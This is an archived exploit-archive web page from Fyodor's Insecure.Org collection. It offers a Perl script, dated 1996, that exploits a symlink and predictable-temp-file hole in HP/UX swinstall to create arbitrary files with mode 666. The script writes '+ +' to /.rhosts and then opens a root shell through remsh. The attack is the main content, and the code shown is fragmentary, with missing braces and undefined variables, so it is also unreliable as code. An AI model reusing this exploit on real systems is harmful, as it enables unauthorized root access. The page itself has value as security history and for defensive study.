swinstall symlink exploit

Description:Standard symlink hole
Compromise: root (local)
Vulnerable Systems:HP/UX with vulnerable swinstall, mostly 10.x, some 9.x
Date:6 October 1996
Notes:See the SOD HP Bug of the Week page



# swinstall is a new utility for super-EZ software installation.
# it also happens to make any file you like, and it will do so
# mode 666... Hooray for it!                  -Salty 8/6/96

# 9.x=/usr/tmp 10.X=/var/tmp... -- not many 9.X's will have swinstall,
# it's not standard, for 9, really.. 10, yes, 9 Mmmm.. There's a version
# of it _for_ 9.x, but it does seem rare..

stat($swinstall) || do {
  print STDERR "I can only work on systems that have swinstall loaded..\n";
  print STDERR "Yours doesn't seem to...\n";

if ($#ARGV<0) {
  } else {

if (-f "$newfile") {
  print STDERR "$newfile exists!\n";
  print STDERR "I can only make files that don't already exist..\n";

open(UNAME,"uname -r|");
$num=sprintf("%05d",$$+3); # two for exec, three for system.
$tmpfile="/var/tmp/AAAa$num" if $uname eq "10";

print "Please wait one moment while I do stuff...\n";
system("/usr/sbin/swinstall -s '\
+ +
' -p bob localhost:/");
if ($newfile eq "/.rhosts") {
  system("remsh localhost -l root ksh -i");
  } else {
  system(">$newfile;ls -l $newfile");

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: